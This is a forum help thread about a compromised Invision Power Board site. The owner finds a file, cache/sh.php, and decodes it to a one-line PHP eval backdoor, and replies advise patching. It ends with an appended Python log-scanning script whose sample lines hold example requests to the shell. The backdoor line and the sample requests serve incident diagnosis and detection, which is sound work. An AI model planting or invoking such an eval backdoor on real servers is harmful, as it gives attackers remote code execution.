December 16, 2012 in Classic self-hosted technical help
So, all of a sudden, Google started doing its little "This site isn't safe" page for one of my domains.
Curious, I ran ClamAV, and then ran IPB's internal scanner. IPB came up with this file titled sh.php.
I went to FTP to see what the contents of this file were. Its location was cache/sh.php, so I didn't think it was a legit file. Plus IPB listed it at 8.
I would post the contents of said file, but I don't know if that would be the best method...
You can find it on Google if you really wanted to, but it starts out as:
========================= END ===================================
Any ideas how it was inserted, if there is a known patch for it, or is there really no need for concern here?
EDIT: Just decoded it on a local machine.
comes out to be
if ( isset($_REQUEST['asc'])) eval (stripslashes( $_REQUEST ['asc']));
Which, again, can be used to run code just from the URL. (index.php?asc=bad code)
Isn't there a way to see which queries have been run from which IP?
And I still want to see an answer to how did it get put there in the first place?
Is your installation patched?
You'll find lots of posts from those who didn't. Just search for the word hacked.
Thanks for that.
Upon further research, I searched an exploit DB and saw exactly what happened.
I just decided to update to 3.4.1. Call it a day. =P
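Added example, not part of the original thread and not IPB's own tooling: one way to answer the question above about which requests came from which IP is to scan the web server access log for the `asc` parameter and for any hit on `cache/sh.php`. It assumes Apache/nginx combined log format; the function name and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SHELL_PATH = "/cache/sh.php"  # location reported in the thread
SHELL_PARAM = "asc"           # parameter the decoded backdoor passes to eval()

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Dec/2012:22:10:01 +0000] "GET /forum/cache/sh.php?asc=echo+1%3B HTTP/1.1" 200 12',
    '203.0.113.7 - - [15/Dec/2012:22:10:09 +0000] "POST /forum/cache/sh.php HTTP/1.1" 200 530',
    '198.51.100.4 - - [15/Dec/2012:22:11:00 +0000] "GET /forum/index.php?showtopic=5 HTTP/1.1" 200 8841',
    '192.0.2.99 - - [16/Dec/2012:03:02:44 +0000] "GET /forum/index.php?asc=echo+2%3B HTTP/1.1" 200 40',
]

def find_backdoor_hits(lines):
    """Return {ip: [(timestamp, method, reason, detail), ...]} for suspicious requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        url = urlsplit(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)
        if SHELL_PARAM in params:
            # parse_qs URL-decodes the value, so the submitted code is readable
            hits[m["ip"]].append((m["ts"], m["method"], "param", params[SHELL_PARAM][0]))
        elif url.path.endswith(SHELL_PATH):
            # $_REQUEST also reads POST bodies and cookies, which access logs
            # do not record, so any request to the file itself is flagged
            hits[m["ip"]].append((m["ts"], m["method"], "path-only", url.path))
    return dict(hits)

if __name__ == "__main__":
    for ip, events in find_backdoor_hits(SAMPLE_LOG).items():
        print(ip)
        for ts, method, reason, detail in events:
            print(f"  [{ts}] {method} {reason}: {detail}")
```

The earliest flagged request only bounds when the backdoor was first used, not how it was written to disk; requests just before that timestamp are where to look for the initial upload.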
This topic is now archived and is closed to further replies.